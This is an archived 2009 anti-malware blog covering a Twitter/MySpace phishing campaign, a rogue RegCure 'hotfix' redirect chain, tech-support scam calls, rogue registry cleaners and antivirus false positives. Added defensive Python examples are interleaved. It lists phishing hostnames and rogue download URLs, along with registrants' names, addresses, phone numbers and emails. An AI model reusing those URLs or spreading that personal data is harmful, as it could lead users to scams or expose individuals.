Blog for hpHosts, and whatever else I feel like writing about ....

Friday, 31 July 2009

Twishing in China (aka the Twitter phishing campaign)

Holger over at MDL gave us a heads up about a Twitter phishing (I've dubbed it Twishing - because it sounded good) campaign hosted in China (where else). This particular one is located at (screenshot to the left);

secure-login.twitter.verifiylogin.com/twitter/

IP: 124.94.101.13

Domain Name : verifiylogin.com
PunnyCode : verifiylogin.com


Registrant:
Organization : zhang xiaohu
Name : zhang xiaohu
Address : changningzhonghuainanlu192hao
City : changning
Province/State : Hunan
Country : CN
Postal Code : 421500

Administrative Contact:
Name : zhang xiaohu
Organization : zhang xiaohu
Address : changningzhonghuainanlu192hao
City : changning
Province/State : Hunan
Country : CN
Postal Code : 421500
Phone Number : 86-0734-3211451
Fax : 86-0734-3211451
Email : zhangxiaohu_0098@126.com

Technical Contact:
Name : zhang xiaohu
Organization : zhang xiaohu
Address : changningzhonghuainanlu192hao
City : changning
Province/State : Hunan
Country : CN
Postal Code : 421500
Phone Number : 86-0734-3211451
Fax : 86-0734-3211451
Email : zhangxiaohu_0098@126.com

Billing Contact:
Name : zhang xiaohu
Organization : zhang xiaohu
Address : changningzhonghuainanlu192hao
City : changning
Province/State : Hunan
Country : CN
Postal Code : 421500
Phone Number : 86-0734-3211451
Fax : 86-0734-3211451
Email : zhangxiaohu_0098@126.com


WhoIs server: whois.paycenter.com.cn


Ref: http://hosts-file.net/?s=verifiylogin.com

These folks are also responsible for phishing scams targeting other social network sites such as MySpace (also valid without the sub-domain runaround);

vids.myspace.com.index.cfm.fuseaction.vids.individual.videoid-34118937searchidf1cdcded042465aba36-8189d15507af.verifiylogin.com



Which can also be found at:

Host: rnyspece.com
IP: 124.94.101.13

and

Host: *.39042084.com
IP: 122.141.85.2
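Both hosts above rely on the same two tricks: a real brand name buried in the subdomain labels of an unrelated registrable domain (verifiylogin.com), and a registrable domain that is a visual near-match of the brand (rnyspece.com, with "rn" standing in for "m"). The following Python check is an added example, not code from the original post; it assumes a plain two-label registrable domain (no public-suffix list) and a constructed allow-list of which domains legitimately own each brand.

```python
"""Flag brand-in-subdomain and look-alike registrable domains.

Added example, not from the original post. It assumes a two-label
registrable domain (last two labels), which is right for the .com hosts
discussed on the page; a production tool would use a public-suffix list.
"""

# Brands and the registrable domains that legitimately own them
# (constructed allow-list for this example).
LEGIT = {
    "twitter": {"twitter.com"},
    "myspace": {"myspace.com"},
}

# Character sequences commonly swapped in to imitate another letter.
# Heuristic only: applied to the domain label before comparison.
CONFUSABLES = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l")]


def registrable_domain(host: str) -> str:
    """Return the last two labels, e.g. 'verifiylogin.com'."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def normalise(label: str) -> str:
    """Collapse confusable sequences so 'rnyspece' becomes 'myspece'."""
    out = label
    for fake, real in CONFUSABLES:
        out = out.replace(fake, real)
    return out


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance via the usual dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,          # delete ca
                           cur[j - 1] + 1,       # insert cb
                           prev[j - 1] + (ca != cb)))  # substitute
        prev = cur
    return prev[-1]


def assess(host: str, max_edits: int = 2) -> list:
    """Return the reasons a host looks like brand impersonation ([] if none)."""
    host = host.lower().strip(".")
    reg = registrable_domain(host)
    sub = host[: -len(reg)].rstrip(".")   # labels left of the registrable domain
    name = normalise(reg.split(".")[0])   # first label of the registrable domain
    reasons = []
    for brand, owners in LEGIT.items():
        if reg in owners:
            continue  # the brand really owns this registrable domain
        if brand in sub:
            reasons.append(
                f"brand '{brand}' appears in subdomain of unrelated domain {reg}")
        if edit_distance(name, brand) <= max_edits:
            reasons.append(f"registrable domain {reg} is a look-alike of {brand}")
    return reasons


if __name__ == "__main__":
    for h in ("secure-login.twitter.verifiylogin.com", "rnyspece.com",
              "www.twitter.com"):
        print(h, "->", assess(h) or "no finding")
```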




Domain Name : rnyspece.com
PunnyCode : rnyspece.com


Registrant:
Organization : lixing
Name : lixing
Address : Shanghaihuashan street 2018
City : shixiaqu
Province/State : shanghaishi
Country : china
Postal Code : 200085

Administrative Contact:
Name : lixing
Organization : lixing
Address : Shanghaihuashan street 2018
City : shixiaqu
Province/State : shanghaishi
Country : china
Postal Code : 200085
Phone Number : 86-021-63936657
Fax : 86-021-63936657
Email : lixing688@gmail.com

Technical Contact:
Name : lixing
Organization : lixing
Address : Shanghaihuashan street 2018
City : shixiaqu
Province/State : shanghaishi
Country : china
Postal Code : 200085
Phone Number : 86-021-63936657
Fax : 86-021-63936657
Email : lixing688@gmail.com

Billing Contact:
Name : lixing
Organization : lixing
Address : Shanghaihuashan street 2018
City : shixiaqu
Province/State : shanghaishi
Country : china
Postal Code : 200085
Phone Number : 86-021-63936657
Fax : 86-021-63936657
Email : lixing688@gmail.com


WhoIs server: whois.paycenter.com.cn


DomainName : 39042084.com

RSP: China Springboard Inc.
URL: http://www.namerich.cn

Name Server......................NS1.333NNN333.COM
Name Server......................NS2.333NNN333.COM
Status...........................ok
Creation Date ..................2009-07-19
Expiration Date .................2010-07-19
Last Update Date ...............2009-07-19

Registrant ID ...................V-X-59425-16306
Registrant Name .................SONG BOLIANG
Registrant Organization .........SONG BOLIANG
Registrant Address ..............HUANZHUGUANGCHANG31
Registrant City..................QD
Registrant Province/State .......SD
Registrant Country Code .........CN
Registrant Postal Code ..........226016
Registrant Phone Number .........+86.053281241156
Registrant Fax ..................+86.053281241156
Registrant Email ................janeob@126.com

Administrative ID ...............V-X-59425-16306
Administrative Name .............SONG BOLIANG
Administrative Organization .....SONG BOLIANG
Administrative Address ..........HUANZHUGUANGCHANG31
Administrative City..............QD
Administrative Province/State ...SD
Administrative Country Code .....CN
Administrative Postal Code ......226016
Administrative Phone Number .....+86.053281241156
Administrative Fax ..............+86.053281241156
Administrative Email ............janeob@126.com

Billing ID ......................V-X-59425-16306
Billing Name ....................SONG BOLIANG
Billing Organization ............SONG BOLIANG
Billing Address .................HUANZHUGUANGCHANG31
Billing City.....................QD
Billing Province/State ..........SD
Billing Country Code ............CN
Billing Postal Code .............226016
Billing Phone Number ............+86.053281241156
Billing Fax .....................+86.053281241156
Billing Email ...................janeob@126.com

Technical ID ....................V-X-59425-16306
Technical Name ..................SONG BOLIANG
Technical Organization...........SONG BOLIANG
Technical Address ...............HUANZHUGUANGCHANG31
Technical City...................QD
Technical Province/State.........SD
Technical Country Code ..........CN
Technical Postal Code ...........226016
Technical Phone Number ..........+86.053281241156
Technical Fax ...................+86.053281241156
Technical Email .................janeob@126.com



; Please register your domains at
; http://www.namerich.cn


WhoIs server: whois.namerich.cn

Thursday, 30 July 2009

RegCure peddled as Microsoft HotFix

I just came across this one on Google, via the sponsored adverts (surprise surprise), and am astounded that neither Google nor Paretologic have done anything about this one.

This particular site is peddling RegCure, claiming it's a Microsoft Hotfix. Not surprisingly, it also doesn't seem to care what terms you use to get to the page - as long as you get there. For example, if I change error%201008.html to error%20i%20wanna%20kill%20rogues.html, we see;

http://microsoft.pcerror.info/errorcode/error%20i%20wanna%20kill%20rogues.html?gclid=CI__rpv1_psCFc0B4wod9Q8f-Q



As you'll no doubt have guessed, all of the "awards" on the page are fake, as are the Microsoft Gold Certified "awards".

The download this site takes you to is;

http://www.pcerror.info/errorfix.exe

Which gives you a file called RegCureSetup_RW.exe. The little redirection wonderland you're taken through is;

http://bigbutton.paretologic.revenuewire.net/regcure/download
http://bigbutton.paretologic.safecart.com/regcure/download
http://www.regcure.com/download/revenuewire/
http://dl2.paretologic.com/downloads/regcure/RegCureSetup_RW.exe

Headers:

HTTP/1.1 302 Found
Date: Fri, 31 Jul 2009 02:52:16 GMT
Server: Apache
Location: http://bigbutton.paretologic.revenuewire.net/regcure/download
Connection: close
Content-Type: text/html; charset=iso-8859-1

HTTP/1.1 301 Moved Permanently
Date: Fri, 31 Jul 2009 02:53:10 GMT
Server: Apache
Location: http://bigbutton.paretologic.safecart.com/regcure/download
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 219
Connection: close
Content-Type: text/html; charset=iso-8859-1

HTTP/1.1 301 Moved Permanently
Date: Fri, 31 Jul 2009 02:53:45 GMT
Server: Apache
Set-Cookie: paretologic=3L4a6088fbba2ac21-bigbutton; expires=Wed, 21-Oct-2009 18:29:45 GMT; path=/; domain=.safecart.com
Location: http://www.regcure.com/download/revenuewire/
Vary: Accept-Encoding
Content-Encoding: gzip
Connection: close
Content-Type: text/html; charset=UTF-8

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Fri, 31 Jul 2009 02:54:09 GMT
Server: Microsoft-IIS/6.0
P3P: CP="ADM OUR IND COM"
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.5
Set-Cookie: rwhop=active; expires=Sat, 31-Jul-2010 02:54:09 GMT; path=/; domain=regcure.com
Set-Cookie: rwtime=1249008849; expires=Sat, 31-Jul-2010 02:54:09 GMT; path=/; domain=regcure.com
Location: http://dl2.paretologic.com/downloads/regcure/RegCureSetup_RW.exe
Content-type: text/html
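To make a capture like the one above easier to review, the following Python is an added example (not the author's tooling) that parses the raw response headers, walks the Location hops, records the cookies each intermediary sets, and checks whether the final hop lands on an executable. The header text embedded below is abridged from the capture on the page.

```python
"""Rebuild a redirect chain from captured HTTP response headers.

Added example, not from the original post. CAPTURE is abridged from the
header capture shown on the page; a fresh capture would normally come from
a client with automatic redirects disabled so each hop is seen.
"""
from urllib.parse import urlsplit

REDIRECT_STATUSES = {301, 302, 303, 307, 308}

CAPTURE = "\n\n".join([
    "HTTP/1.1 302 Found\n"
    "Server: Apache\n"
    "Location: http://bigbutton.paretologic.revenuewire.net/regcure/download\n"
    "Content-Type: text/html; charset=iso-8859-1",

    "HTTP/1.1 301 Moved Permanently\n"
    "Server: Apache\n"
    "Location: http://bigbutton.paretologic.safecart.com/regcure/download",

    "HTTP/1.1 301 Moved Permanently\n"
    "Set-Cookie: paretologic=3L4a6088fbba2ac21-bigbutton; expires=Wed, "
    "21-Oct-2009 18:29:45 GMT; path=/; domain=.safecart.com\n"
    "Location: http://www.regcure.com/download/revenuewire/",

    "HTTP/1.1 302 Moved Temporarily\n"
    "Server: Microsoft-IIS/6.0\n"
    "Set-Cookie: rwhop=active; expires=Sat, 31-Jul-2010 02:54:09 GMT; "
    "path=/; domain=regcure.com\n"
    "Set-Cookie: rwtime=1249008849; expires=Sat, 31-Jul-2010 02:54:09 GMT; "
    "path=/; domain=regcure.com\n"
    "Location: http://dl2.paretologic.com/downloads/regcure/RegCureSetup_RW.exe\n"
    "Content-type: text/html",
])


def parse_responses(capture: str) -> list:
    """Split a capture on blank lines into {'status', 'headers'} dicts.

    Header names are lower-cased; repeated headers (Set-Cookie) are kept.
    """
    responses = []
    for block in capture.strip().split("\n\n"):
        lines = block.strip().splitlines()
        status = int(lines[0].split()[1])          # 'HTTP/1.1 302 Found'
        headers = []
        for line in lines[1:]:
            name, _, value = line.partition(":")   # first colon only
            headers.append((name.strip().lower(), value.strip()))
        responses.append({"status": status, "headers": headers})
    return responses


def header(resp: dict, name: str) -> list:
    """All values of one header (possibly several, e.g. Set-Cookie)."""
    return [v for n, v in resp["headers"] if n == name]


def redirect_chain(start_url: str, responses: list):
    """Follow Location headers in capture order.

    Returns (hops, cookies): the URLs visited, starting with start_url,
    and the name=value part of every cookie set along the way.
    """
    hops = [start_url]
    cookies = []
    for resp in responses:
        if resp["status"] not in REDIRECT_STATUSES:
            break                                   # final, non-redirect response
        location = header(resp, "location")
        if not location:
            break
        cookies += [c.split(";", 1)[0] for c in header(resp, "set-cookie")]
        hops.append(location[0])
    return hops, cookies


def hosts(hops: list) -> list:
    """Hostnames of each hop, useful for spotting affiliate intermediaries."""
    return [urlsplit(u).hostname for u in hops]


def executable_landing(hops: list) -> bool:
    """True if the chain ends on a Windows executable download."""
    return urlsplit(hops[-1]).path.lower().endswith((".exe", ".msi", ".scr"))


if __name__ == "__main__":
    chain, jar = redirect_chain("http://www.pcerror.info/errorfix.exe",
                                parse_responses(CAPTURE))
    for i, url in enumerate(chain):
        print(f"hop {i}: {url}")
    print("cookies set:", jar)
    print("lands on executable:", executable_landing(chain))
```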


Just so we're clear - it's this type of behaviour that has not only gotten Paretologic a bad name, but has also gotten them blacklisted as rogues in many people's eyes (mine being one of them).

So who owns pcerror.info? Well, if you'd believed the About page, you'd have thought Paretologic themselves do, as the BBB accreditation links to a page that certifies Paretologic are accredited by the BBB;

http://www.pcerror.info/about.php

... and the Contact page, which displays the Paretologic address;

http://www.pcerror.info/contact.php




However, I doubt Paretologic would do this themselves, especially given they know the security community are watching them like a hawk, given their past behaviour and lack of action concerning affiliates. In this case, I'm inclined to give the benefit of the doubt, and say an affiliate runs the site.

Not surprisingly, the WhoIs for pcerror.info doesn't give us anything, as that's hidden.

http://hosts-file.net/?s=pcerror.info&wn=1

References:

Paretologic vs MalwareURL
http://hphosts.blogspot.com/2009/07/paretologic-vs-malwareurl.html

SupportOnClick: Phoned by Malwarebytes? BigPond? Anyone else?

I wrote a few months ago, about a company called SupportOnClick, that had been reported as phoning people out of the blue, claiming their computers had told them their computers were infected.

A report on the Malwarebytes forums a little earlier, by an irate user, suggests this company is, annoyingly, still using this ruse to scam people out of money.

Research also shows SupportOnClick have called people claiming they work for BigPond.

Deciding enough was enough, again, I phoned SupportOnClick myself, on one of their UK numbers (01274 900834), to find out what they were playing at. I've never been so frustrated. The guy I spoke to, claimed they weren't claiming they were Malwarebytes, nor were they scamming people, but that they were simply calling existing customers - asked why thousands of reports suggest otherwise, he then proceeded to ask about me. After advising him of who I was (a Malwarebytes researcher, and owner of the hpHosts blacklist), he then proceeded to ask ME about a problem he was having with MBAM on HIS computer! I doubt he was being serious about this, and was instead, trying to gauge my response. In either case, I refused to be sidetracked. Long story short, I got nowhere.

I've phoned Trading Standards again, to see if there is anything they can do, and alas, all I could do was file a report.

I'd like to advise ALL of you, if you receive one of these calls, please try and record it. Second, DO NOT allow them to connect to your computer, under any circumstances (they apparently use the LogMeIn service to do this), and DO NOT give them your credit card details - instead, simply hang up the phone.

If you do manage to get a recording of one of these calls, please send me a copy of it (or post it to the Malwarebytes forums), and additionally, if you are in the UK, report the company not only to Trading Standards and Watchdog, but to law enforcement as well - the more we can do to get this company shut down, the better.

If you are in the US, report them to the FBI (I believe the BBB (Better Business Bureau) or Chamber of Commerce will be able to take your report as well).

For those in Australia, as well as reporting it to law enforcement, you'll need to make sure you also report it to the ACCC (Australian Competition and Consumer Commission).

As a final note, you should also report it to your phone company!

REMEMBER: Malwarebytes will NEVER telephone you! Further, any company phoning you to tell you your computer is infected or having problems is SCAMMING YOU


/edit 01-08-2009

Just an update, the user at the MBAM forums posted the details of the individual that phoned him;

Neil Berkman (not sure if the spelling is correct)
employee ID 10655
1-800-698-9034
BOTNURSE

Note the number is SupportOnClick's toll free number (so feel free, for those in the US that get these calls, to call them on the 1800 number and give them a piece of your mind ;o)).

References:

Malwarebytes forums - BAD salesman
http://www.malwarebytes.org/forums/index.php?showtopic=20424

SupportOnClick update
http://hphosts.blogspot.com/2009/04/supportonclick-update.html

supportonclick.com scamming you by telephone!
http://hphosts.blogspot.com/2009/03/supportonclickcom-scamming-you-by.html

Scareware scammers adopt cold call tactics
http://www.theregister.co.uk/2009/04/10/supportonclick_scareware_scam

Monday, 27 July 2009

Rogue RegTidy/RegistryConvoy: Would you let him do your marketing?

I certainly wouldn't, not if the following is anything to go by. This all started after the members of WoT (Web of Trust), came across his site and flagged it as rogue. Nigel Lew, who runs marketing firm "J.N. Lew Design Group" popped along to tell all of us lowly folk that his company does the marketing for RegTidy and that it wasn't a rogue.

You can forgive him for not knowing that in Windows, REGTIDY.DLL <> RegTidy.dll (only Linux/Macs are case sensitive). But from here, I'm afraid, it goes downhill. His first mistake of course, was assuming that us lowly folk don't actually know what we're doing, or as he put it;

Hi, my job is brand management. That is what I was referring to. It's abundantly clear that most of you folks don't do this for money.

I do however handle this sort of IT stuff, I am looking at the flippen source code as we speak. I think I have a much better handle on what said file does than noobs and folks that don't know how to sandbox an app or run a VM.

And like I said, you folks provided me with weeks of damage control, for that, I thank you kindly :)


When pointed out to him that RegTidy was also known as RegistryConvoy, he suggested that it was simply because the latter was being rebranded due to a previous marketing company going nuts - suggesting to him that this was in fact a load of codswallop as both had only existed for a matter of weeks (regtidy.com created 2009-07-07, with registryconvoy.com created 2009-06-11), he then decided that actually, it was because;

The latter is a much better name, period. That is not rocket science.


I'll let you draw your own conclusions of his proclaiming he's not a programmer, but had the source code in front of him and could tell it was legit.

Progressing further, I decided enough was enough and posted my own test results (he somehow thought we'd not actually tested it and were just slating it for err .... ??), which were;

1. It claims errors exist even BEFORE it has actually scanned anything;

http://temerc.com/imgRegTidy_com_-_main_UI.gif

2. It listed over 400 "problems" that either didn't exist and/or were NOT problems (in fact, removal of some of the keys, including some of the EMPTY keys, would have crippled the system).

http://temerc.com/imgRegTidy_com_-_scan_results.gif

3. It provides no means of saving the results to a log for manual analysis

Ref:
http://www.mywot.com/en/forum/4013-regtidy-2009?comment=17751#comment-17751

Getting on a bit, Nigel then decided that actually, the program WAS displaying misleading behaviour and in his words;

Most if not all dodgy behavior has been removed from the app based on my consultations a week ago. I have no interest in marketing an app that is a load of crap. Most, if not all suspect marketing is in the middle of being removed and replaced with the ones for the corresponding app as we speak as well.


Nigel then informed us that the new version, complete with his suggestions, was now on the site ready for us.

So, latest download link can be found anywhere on regtidy.com it does not auto do shit except start with windows which is easily rectified in the properties like every other app on the planet from win messenger to data recovery stuff.


Alas however, I tested the "latest" version, and can only surmise that his claims of improvements were absolute tosh, the misleading behaviour was still there, as were the abundance of F/P's (F/P's that either led to keys not present, led to problems that weren't actually problems, or keys that if removed, would've crippled the system).

Nigel didn't like my results however, and decided he would backpedal a bit, and tell me that actually, the new version was not on the site yet .... woops! Questioning this however, showed that Nigel actually decided that profanity and threats of hanging my ass out in public, would be a better form of marketing.

Given the conversation thus far, I can't see this getting any better for poor Nigel as he simply doesn't seem to get it, instead trying to claim we're all n00bs that don't know anything and are basing our claims on the detections of one AV or another (since the conversation started, 3 more vendors now flag RegTidy and regtidy.com). He doesn't seem to understand that yes, most of us do this stuff as a hobby voluntarily, but some of us actually do this as a full time job, and we're damn well good at what we do (that's not to say we're not prone to mistakes, of course we are) and in this particular case, we're 100% correct - RegTidy/RegistryConvoy or whatever name they want to go with, IS A ROGUE.

What I do find intriguing, is that RegTidy's developers haven't bothered to comment whatsoever, instead deciding to leave it all to Nigel (damn sure if I was a legit vendor and someone was saying otherwise, I wouldn't care who I'd hired - I'd be the first to jump in to defend myself and my programs), which given what I've seen thus far, is going to have been a huge mistake on RegTidy's part.

You can read the full story on the MyWot forums;

http://www.mywot.com/en/forum/4013-regtidy-2009

Sunday, 26 July 2009

F/P Central: ClamWin gone wild!

It seems ClamWin is on a roll as far as F/P's are concerned. I've got it set on a schedule to periodically scan my servers, and to my surprise, received the following via e-mail yesterday;

\Downloads\Extensions\vURL_Extension\vurl-1_1_0-setup.exe: Trojan.Delf-8426 FOUND
\AB_Extension_Pack\1_2_2\abep-1_2_2-setup.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_3\cookieinfo-1_1_3-basic.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_3\cookieinfo-1_1_3-full.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_4\cookieinfo-1_1_4-basic.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_4\cookieinfo-1_1_4-full.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_5\cookieinfo-1_1_5-basic.exe: Trojan.Delf-8426 FOUND
\Cookie_Info\1_1_5\cookieinfo-1_1_5-full.exe: Trojan.Delf-8426 FOUND
\hpObserver\0_1_0\hpobserver0_1_0-basic.exe: Trojan.Delf-8426 FOUND
\hpObserver\0_1_1\hpobserver0_1_1-basic.exe: Trojan.Delf-8426 FOUND
\hpObserver\0_1_2\hpobserver0_1_2-basic.exe: Trojan.Delf-8426 FOUND
\PUI\1_1_7\puisetup.exe: Trojan.Delf-8426 FOUND
\PUI\1_1_7\puisetup_basic.exe: Trojan.Delf-8426 FOUND
\RF_Types\1_0_4\rft_setup.exe: Trojan.Delf-8426 FOUND
\RF_Types\1_0_4\rft_setup_basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_1_8\vurl_de-0_1_8-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_0\vurl_de-0_2_0-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_1\vurl_de-0_2_1-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_3\vurl_de-0_2_3-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_4\vurl_de-0_2_4-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_5\vurl_de-0_2_5-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_6\vurl_de-0_2_6-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_7\vurl_de-0_2_7-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_8\vurl_de-0_2_8-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_9\vurl_de-0_2_9-basic.exe: Trojan.Delf-8426 FOUND
\vURL_Desktop_Edition\0_2_9\vurl_de-0_2_9-full.exe: Trojan.Delf-8426 FOUND
\vURL_Extension\vurl-1_1_0-setup.exe: Trojan.Delf-8426 FOUND


Evidently highly concerned that an infection had wormed its way onto my server, I checked the files' dates; they hadn't changed - perhaps whatever it was had infected the files but left their dates as they were? Unusual but possible. I therefore downloaded myself a copy of the files, and checked them against my local (original) copy - no difference.

I'd already figured these were F/P's, but wanted to be 100% sure. Checking the files showed they were indeed all F/P's - which, evidently, highly annoyed me. I tried submitting the file via the ClamWin F/P report form - no go, claimed the file wasn't password protected (yes it damn well was), so I tried e-mailing it - nope, got returned to me with a delivery report error due to the attachment. As a last ditch attempt, I forwarded it directly to the e-mail address that clamwin@clamwin.com forwards all e-mail to (didn't realise it did until I got the delivery report) - no error returned, no response - I figured it was being ignored.

Lo and behold, ClamWin just updated itself a few minutes ago and surprise surprise, these F/P's are now fixed. Obviously this is a good thing, but I'm surprised it only picked on these files, and frustrated that not only did I not get a response from ClamWin, but that these F/P's are becoming increasingly common for ClamWin lately.
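The check described above (a single signature firing across every build of your own installers, then comparing each flagged file against the original copy) is easy to automate. The Python below is an added example, not the author's tooling: it parses ClamWin's "path: Signature FOUND" report lines, compares each flagged file's SHA-256 against a known-good manifest recorded at publish time, and counts hits per signature. The file contents, hashes and report lines are constructed for the example.

```python
"""Triage AV hits by comparing flagged files against known-good hashes.

Added example, not the author's own tooling. The report lines mirror the
ClamWin 'path: Signature FOUND' format shown on the page; the file bytes
and manifest hashes below are constructed so the example runs in memory.
"""
import hashlib
import re
from collections import Counter

FOUND_LINE = re.compile(r"^(?P<path>.+?): (?P<sig>\S+) FOUND$")


def parse_report(text: str) -> list:
    """Return (path, signature) pairs for every FOUND line in a scan report."""
    hits = []
    for line in text.splitlines():
        m = FOUND_LINE.match(line.strip())
        if m:
            hits.append((m["path"], m["sig"]))
    return hits


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def triage(hits: list, manifest: dict, read_bytes) -> dict:
    """Classify each hit against the publish-time manifest.

    manifest:   path -> SHA-256 recorded when the file was published.
    read_bytes: callable returning the file's current bytes for a path
                (injected so the example can run on an in-memory corpus).
    Verdicts:   'unchanged' (matches the published hash: a likely false
                positive), 'modified' (hash differs: treat as real), or
                'unknown' (no reference hash, so nothing can be concluded).
    """
    verdicts = {}
    for path, sig in hits:
        expected = manifest.get(path)
        if expected is None:
            verdicts[path] = ("unknown", sig)
        elif sha256_of(read_bytes(path)) == expected:
            verdicts[path] = ("unchanged", sig)
        else:
            verdicts[path] = ("modified", sig)
    return verdicts


def signature_summary(hits: list) -> Counter:
    """Hits per signature: one signature across many unrelated builds from
    the same publisher is itself a strong false-positive indicator."""
    return Counter(sig for _, sig in hits)


# --- constructed demo corpus (not real files or real hashes) -------------
FILES = {
    r"\vURL_Extension\vurl-1_1_0-setup.exe": b"MZ... original installer bytes",
    r"\PUI\1_1_7\puisetup.exe": b"MZ... original installer bytes v2",
    r"\hpObserver\0_1_0\hpobserver0_1_0-basic.exe": b"MZ... tampered bytes",
}
MANIFEST = {
    r"\vURL_Extension\vurl-1_1_0-setup.exe": sha256_of(b"MZ... original installer bytes"),
    r"\PUI\1_1_7\puisetup.exe": sha256_of(b"MZ... original installer bytes v2"),
    r"\hpObserver\0_1_0\hpobserver0_1_0-basic.exe": sha256_of(b"MZ... original bytes"),
}
REPORT = "\n".join([
    r"\vURL_Extension\vurl-1_1_0-setup.exe: Trojan.Delf-8426 FOUND",
    r"\PUI\1_1_7\puisetup.exe: Trojan.Delf-8426 FOUND",
    r"\hpObserver\0_1_0\hpobserver0_1_0-basic.exe: Trojan.Delf-8426 FOUND",
    r"\Cookie_Info\1_1_3\cookieinfo-1_1_3-basic.exe: Trojan.Delf-8426 FOUND",
])


def demo():
    """Run the triage over the constructed corpus; returns (verdicts, summary)."""
    hits = parse_report(REPORT)
    return triage(hits, MANIFEST, FILES.__getitem__), signature_summary(hits)


if __name__ == "__main__":
    verdicts, summary = demo()
    for path, (verdict, sig) in verdicts.items():
        print(f"{verdict:9} {sig}  {path}")
    print(dict(summary))
```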

Dear Tagged .... weren't you already being sued for this?

Evidently, Tagged being sued isn't going to stop them from spamming out fake invites.


Little hint to Mr Tagged: since I've never registered for your service, and you've sent this to an e-mail address that I've never used for err, e-mail, I can only surmise you nicked the details when you scammed one of my friends/family members into registering and they were gullible enough to hand over their WLM credentials .... either way - spamming me was not a very bright idea, especially given you've just been sued for exactly this behaviour (don't worry, I'll be sure to let the NYAG know you've taken absolutely no notice of them).

References:

N.Y. Attorney General To Sue 'Tagged' Social Networking Site
http://www.crn.com/security/218401533;jsessionid=0JVVUYCMFA43AQSNDLPSKH0CJUNN2JVN

ClamWin + Notepad = Woops

ClamWin has developed yet another F/P, this time not very serious thankfully.

Interestingly, this only appears to be affecting my XP systems at present, the Vista system and servers are unaffected.

C:\WINDOWS\notepad.exe: Trojan.Zbot-5074 FOUND
C:\WINDOWS\ServicePackFiles\i386\notepad.exe: Trojan.Zbot-5074 FOUND
C:\WINDOWS\system32\notepad.exe: Trojan.Zbot-5074 FOUND

Saturday, 25 July 2009

Dear Yahoo, START READING! ABUSE! REPORTS!

Remember this? It referenced a domain that was part of an HM Revenue & Customs phishing scam. As the domain was hosted by Yahoo (the domain in question is failing to resolve as of a few minutes ago), I decided to fire them an abuse report. Alas however, their first response was laughable, as it showed they'd clearly not read the abuse report;

Hello,

Thank you for writing to Yahoo! Mail.

I understand your frustration in receiving unsolicited email. While we
investigate all reported violations against the Yahoo! Terms of Service
(TOS), in this particular case the message you received was not sent
through the Yahoo! Mail system.

Yahoo! has no control over activities outside its service, and therefore
we cannot take action. You may try contacting the sender's email
provider, by identifying the sender's domain and contacting the
administrator of that domain. The sender's provider should be in a
better position to take appropriate action against the sender's account.

The email message itself does contain some information relating to the
sender's identity. Yahoo! includes the originating Internet Protocol
(IP) address in the full Internet headers of all messages sent through
Yahoo! Mail, so that we will have information regarding the origin of
messages sent through our system. The originating IP address should be
located in the very last "Received" line of the full Internet headers
and corresponds to the sender's Internet Service Provider (ISP).

Please see the following URL for more assistance:

http://help.yahoo.com/l/us/yahoo/mail/original/abuse/abuse-17.htm

Once you have identified the IP address, you can conduct an IP lookup to
determine which ISP provides this person with Internet access. One such
lookup tool you may want to try is:

http://www.arin.net/whois/

You can then attempt to contact that ISP to report any abuse activities
occurring within their service.

In addition, please visit the following website for useful tools to
combat spam:

http://antispam.yahoo.com/

If we can be of further assistance, please let us know.

Your patience during this process is greatly appreciated.

Thank you again for contacting Yahoo! Mail.

Regards,

Cristene

Yahoo! Customer Care

62714199

For assistance with all Yahoo! services please visit:

http://help.yahoo.com/


What's actually more annoying than this, is that I received an automated response prior to receiving these, to let me know they'd received the report.

Frustrated with their response, I decided to reply with clarification that yes, I was aware that the e-mail had not originated from Yahoo, and that the domain in question (y'know, the damn thing I sent to their abuse dept!) WAS HOSTED BY YAHOO!. Given the netblock information for this particular IP space only gives one abuse e-mail address to send stuff to, it wasn't a case of my sending the abuse report to the wrong address.

Expecting to have someone actually bother to read my response, and then read the original damn report and respond to THAT, I was absolutely disgusted to have then received this, which came in a couple minutes ago;

Hello Steven,

Thank you for writing to Yahoo! Mail.

We understand your frustration in receiving unsolicited email. While we
investigate all reported violations against the Yahoo! Terms of Service
(TOS), in this particular case the message you received was not sent by
a Yahoo! Mail user.

Yahoo! has no control over activities outside its service, and therefore
we cannot take action. You may try contacting the sender's email
provider, by identifying the sender's domain and contacting the
administrator of that domain. The sender's provider should be in a
better position to take appropriate action against the sender's account.

The email message itself does contain some information relating to the
sender's identity. Yahoo! includes the originating Internet Protocol
(IP) address in the full Internet headers of all messages sent through
Yahoo! Mail, so that we will have information regarding the origin of
messages sent through our system. The originating IP address should be
located in the very last "Received" line of the full Internet headers
and corresponds to the sender's Internet Service Provider (ISP).

Please see the following URL for more assistance:

http://help.yahoo.com/help/us/mail/spam/spam-05.html

Once you have identified the IP address, you can conduct an IP lookup to
determine which ISP provides this person with Internet access. One such
lookup tool you may want to try is:

http://www.arin.net/whois/

You can then attempt to contact that ISP to report any abuse activities
occurring within their service.

